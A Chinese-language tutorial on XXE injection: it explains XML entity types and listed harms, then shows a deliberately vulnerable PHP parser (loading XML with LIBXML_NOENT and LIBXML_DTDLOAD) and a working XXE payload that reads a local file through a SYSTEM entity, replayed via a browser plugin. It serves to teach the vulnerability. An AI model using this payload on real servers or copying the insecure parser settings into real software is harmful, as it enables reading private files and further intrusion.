简介
XXE (XML External Entity Injection) 漏洞发生在应用程序解析 XML 输入时,没有禁止外部实体的加载。
简单的理解,一个实体就是一个变量,可以在文档中的其他位置引用该变量。
实体主要分为四种:
- 内置实体 (Built-in entities)
- 字符实体 (Character entities)
- 通用实体 (General entities)
- 参数实体 (Parameter entities)
完整的介绍可以参考: DTD - Entities
到此网站学习一下: http://www.w3school.com.cn/dtd/
http://www.w3school.com.cn/xml
http://www.w3school.com.cn/xml
http://hublog.hubmed.org/archives/001854.html
https://www.tutorialspoint.com/dtd/dtd_entities.htm
http://blog.leanote.com/post/xuxi/XXE%E6%80%BB%E7%BB%93 //XXE总结
https://security.tencent.com/index.php/blog/msg/69
http://www.freebuf.com/articles/web/97833.html
危害:
对于 XXE 的危害,主要有:
- 窃取敏感数据 (extracting sensitive data).
- 远程代码执行 (remote code execution).
- 攻击者可以实现任意文件读取,DOS拒绝服务攻击以及代理扫描内网等.
举例:
- 服务器上面有一个xxeInject.php存在一个注入的文件,正常访问。
- 文件内容:
<?php #关闭Warning error_reporting(E_ALL^E_NOTICE^E_WARNING); #加载xml文件,不懂php://input 参考下面链接 #http://taoshi.blog.51cto.com/1724747/1165499 $xmlfile = file_get_contents('php://input'); $dom = new DOMDocument(); # LIBXML_NOENT: 将 XML 中的实体引用 替换 成对应的值 # LIBXML_DTDLOAD: 加载 DOCTYPE 中的 DTD 文件 $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); $creds = simplexml_import_dom($dom); $user = $creds->user; $pass = $creds->pass; echo "Hello DaLao:" . "<br>" . "$user"; ?>
- 存在一个POST,XXE注入,所以我们构造代码,进行注入,因为是测试,我新建了一个文件如:C://pass.txt,内容:ONDragon'Password,我们就利用这个漏洞进行此文件的读取。
- 构造代码:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE ONDragon [ <!ELEMENT ONDragon ANY > <!ENTITY xxe SYSTEM "file:///C://pass.txt" >]> <creds> <user>&xxe;</user> <pass>ONDragon</pass> </creds>
- 我们打开火狐的Live Http这个小插件进行POST数据注入。
- 把我们的POST数据包复制上去,然后Replay,就可以获取C://pass.txt,内容:ONDragon'Password啦。
- 可以看到利用它,可以查看服务器上的文件。
- 命令执行得需要服务器有一个expect扩展插件,如果按照此插件,就可以进行远程命令执行。
- 此外还可以进行类似SSRF的攻击,内网信息收集,端口扫描等等。